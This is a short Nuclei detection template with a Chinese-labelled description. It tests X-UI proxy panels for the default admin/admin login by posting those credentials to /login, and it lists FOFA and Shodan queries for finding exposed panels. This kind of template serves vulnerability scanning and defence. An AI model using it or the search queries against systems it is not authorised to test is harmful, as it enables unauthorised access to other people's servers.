漏洞描述
X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
xui-default-login: X-UI - Default Login
PoC代码[已公开]
id: xui-default-login
info:
name: X-UI - Default Login
author: dali
severity: high
description: |
X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/vaxilu/x-ui
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
classification:
cwe-id: CWE-798
cpe: cpe:2.3:a:vaxilu:x-ui:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
fofa-query: title="X-UI Login"
shodan-query: title:"X-UI Login"
product: x-ui
vendor: vaxilu
tags: x-ui,default-login,vuln
http:
- method: GET
path:
- "{{BaseURL}}/login"
- method: POST
path:
- "{{BaseURL}}/login"
headers:
content-type: application/x-www-form-urlencoded
body: "username={{username}}&password={{password}}"
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
matchers-condition: and
matchers:
- type: dsl
dsl:
- '!contains(http_1_body, "\"success\":true")'
- 'contains_all(http_2_body, "\"success\":true", "msg\":")'
- "contains(http_2_header, 'application/json')"
- "http_2_status_code == 200"
condition: and
# digest: 4b0a004830460221009db5ad9a707d5b5d1d7d5453f0e073bf0f5a61cafa6a15f215f6af09ce756b090221008092e0e7ff1d0df2d64ee1f83080407d1c64aecc1d06ac992a3fd75a67eae0e1:922c64590222798bb761d5b6d8e72950